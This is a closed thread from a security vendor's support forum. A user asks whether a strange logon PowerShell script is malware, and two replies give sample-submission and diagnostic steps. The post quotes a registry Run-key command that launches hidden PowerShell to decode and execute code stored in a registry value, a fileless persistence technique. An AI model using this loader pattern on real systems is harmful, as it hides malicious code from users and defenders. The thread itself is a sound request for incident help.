To stay updated on your favorite discussions, please create an account or log in. Then, click the Bookmark icon to subscribe and receive notifications.

strange power shell script

tecnicogsn W/ Alumni Posts: 1 Security Scout

Dear Support,

today i discovered a windows 7 workstation that during the user access was starting a strange powershell script.

Looking in Run key of the registry i seen this string: 


"cmstsitf"="rundll32 shell32.dll,ShellExec_RunDLL \"cmd\" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F').chsbWNet))"


Loking in the registry key 9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F i see this data.

(The byte data is mutch longher)




Could be some king of malware?


  • JamesC
    JamesC W/ Partner, W/ Staff, W/ Moderator Posts: 526 Moderator

    Hi tecnicogsn


    If you suspect that:
    • A clean file has been falsely detected as malicious, or;
    • A file that is malicious but has not been detected by our software
    You can submit the file to our labs for further investigation. To submit a sample file, go to Submit a Sample or browse to the following link:
    1. Select the File Sample tab.
    2. Click Choose File, and attach your sample file.
      • Tick the box I want to give more details about this sample and to be notified of the analysis results if you want to receive feedback from F-Secure Labs on the submitted file.
      • Note: Subject and description should be written in English.
    3. Verify that you are not a robot with reCAPTCHA.
    4. Click Submit sample file.
    The sample submission is analyzed by our analysts and databases, and is updated if necessary.

    For more information how you can submit a sample, read our Community article here.
  • etomcat
    etomcat W/ Alumni Posts: 1,172 Firewall Master



    I think you should use the built-in "F-Secure Support Tool" diagnostics on the computer, either through local run or activated remotely via centralized management and submit the resulting FSDIAG compressed file to F-Secure tech support. That often allows them to find out what's going on, even if an outright binary sample of the suspected malware cannot be located.


    Best Regards: Tamas Feher, Hungary.

This discussion has been closed.